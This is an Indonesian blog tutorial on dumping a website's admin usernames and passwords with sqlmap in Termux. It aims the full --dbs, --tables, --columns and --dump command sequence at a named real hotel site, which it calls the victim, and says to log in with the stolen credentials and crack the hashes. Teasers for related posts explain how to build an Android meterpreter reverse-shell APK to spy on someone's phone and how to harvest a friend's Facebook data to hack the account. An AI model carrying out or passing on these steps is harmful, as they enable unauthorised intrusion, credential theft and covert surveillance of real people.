Langsung ke konten utama

Cara mengetahui user dan password website menggunakan Sqlmap di Termux





Halo sobat.
Kali ini saya akan memberikan tutorial cara mendapatkan username dan password sebuah website menggunakan Sqlmap di Termux.
Jika kalian belum memiliki korban/website yang Vuln untuk di inject,silahkan anda menuju cara mencari website Vuln menggunakan Termux.

Siapkan alat tempur Termux nya.
Lalu jalankan tools Sqlmap.
Jika kamu belum install tool Sqlmap nya,silahkan menuju Cara install Sqlmap di Termux.
Jika sudah install,silahkan langsung
ketik perintah:

cd sqlmap
python2 sqlmap.py

Jika sudah,tampilan nya akan seperti gambar dibawah:



Setelah itu.
Ketik perintah:




python2 sqlmap.py -u http://website_korban.com/index.php?id=1 ---dbs

Contoh:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 --dbs

Lalu tekan Enter.

Gambar:

Perintah diatas adalah untuk mendapatkan nama Database website tersebut.
-u adalah untuk URL website dan --dbs adalah untuk mendapatkan Database nya.

Tunggu hingga proses selesai dan mendapatkan nama Database website nya.

Jika proses selesai dan kita mendapatkan nama Database nya.
Tampilan nya akan seperti gambar dibawah ini:


Setelah mendapat nama Database,sekarang kita mencari tabel yang terdapat pada database tersebut.

Ketik perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D nama_database --tables

Contoh:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM --tables

Lalu tekan Enter.

Perintah diatas adalah untuk mendapatkan tabel-tabel yang terdapat pada database dbch13_HM.

--tables adalah perintah untuk mendapatkan tabel pada database.
Jika kita mendapatkan tabel nya.
Tampilannya seperti gambar dibawah:


Gambar diatas menunjukkan nama-nama tabel yang terdapat pada database.

Selanjutnya kita akan menggunakan perintah --columns untuk mendapatkan data pada tabel.
Diatas kita sudah mendapatkan tabel admin yang berisi data login admin ke website nya.
Mari kita lanjutkan membuka tabel yg kita inginkan.

Disini saya akan membuka tabel yp_admin untuk mendapatkan data login admin seperti username dan password nya.

Ketik perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM -T yp_admin --columns

Lalu Enter.

Jika kita mendapatkan colom pada tabel nya, tampilannya seperti gambar dibawah ini.

Diatas adalah kolom yang terdapat pada tabel yp_admin.

Untuk mendapatkan username dan password yg terdapat pada kolom,kita tinggal mengetikkan perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM -T yp_admin -C admin_id,password --dump

Lalu Enter.

--dump adalah perintah untuk mendapatkan data yang terdapat pada kolom tersebut,seperti username dan password.




Jika proses selesai, penampakan nya akan seperti ini.


Kita telah mengetahui username dan password website tersebut,dan kita tinggal login menggunakan data yang kita dapatkan.

Biasanya password yang kita dapatkan masih di HASH.
untuk crack hash sobat bisa cari di Google.

Sekian tutorial kali ini.
Semoga bermanfaat.
Terima kasih.😊
Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Cara Menggunakan Metasploit di Termux

Metasploit adalah tools untuk menyadap hp seseorang. Dengan tool ini kita dapat melihat isi SMS,log panggilan, screenshot gambar,merekam suara dan banyak lagi. Untuk cara menggunakan nya sangat mudah  Disini saya akan menjelaskan secara rinci tentang bagaimana cara menggunakan tool Metasploit. Syaratnya kamu harus sudah menginstal aplikasi Termuda,dan menginstal tool Metasploit di termux kamu. Jika belum silahkan download Termux di Play Store. Jika kalian sudah install Termux nya tetapi belum menginstal tool Metasploit, silahkan lihat tutorial cara install Metasploit di Termux. Jika Syarat nya sudah lengkap mari kita lanjutkan. Buka aplikasi Termux kamu. Pertama kita akan membuat payload/backdoor atau virus yang kita gunakan untuk dirimkan ke korban agar dapat akses ke HP nya. Silahkan ketik:  msfvenom -p android/meterpreter/reverse_tcp LHOST= IP Kamu LPORT=8080 -o /sdcard/virus.apk Lalu yang ditanda hijau isikan IP Address HP kamu. ...
20 komentar
Baca selengkapnya

Cara Mendapatkan Informasi Akun Facebook Teman Menggunakan OSIF di Termux

Cara Mendapatkan Informasi Akun Facebook Teman Menggunakan OSIF di Termux. Menggunakan tool OSIF kita dengan mudah dapat informasi tentang akun Facebook Teman kita sendiri. Seperti misalnya Id Facebook,email, alamat, nomor telepon,dan semua informasi yang kita butuhkan. Dan dari informasi itu,kita dapat menggunakan nya untuk meretas atau hack sebuah akun Facebook. Jika Anda belum memiliki aplikasi Termux. Silahkan download di  Play Store . Jika Anda sudah memiliki aplikasi Termux,mari kita lanjutkan. 1.Buka aplikasi Termux. 2.Silahkan ketik perintah dibawah. Install python2 apt install python2 Install module pip2 install requests mechanize Install git apt install git Closing Github git clone https://github.com/mdpunk/OSIF Buka folder osif cd OSIF Lakukan install Pip2 pip2 install -r requirements.txt Dan jalankan tool osif python2 osif.py Gambar: Nah... Untuk mengambil data teman Facebook kita,kita harus mendapatkan token. Unt...
10 komentar
Baca selengkapnya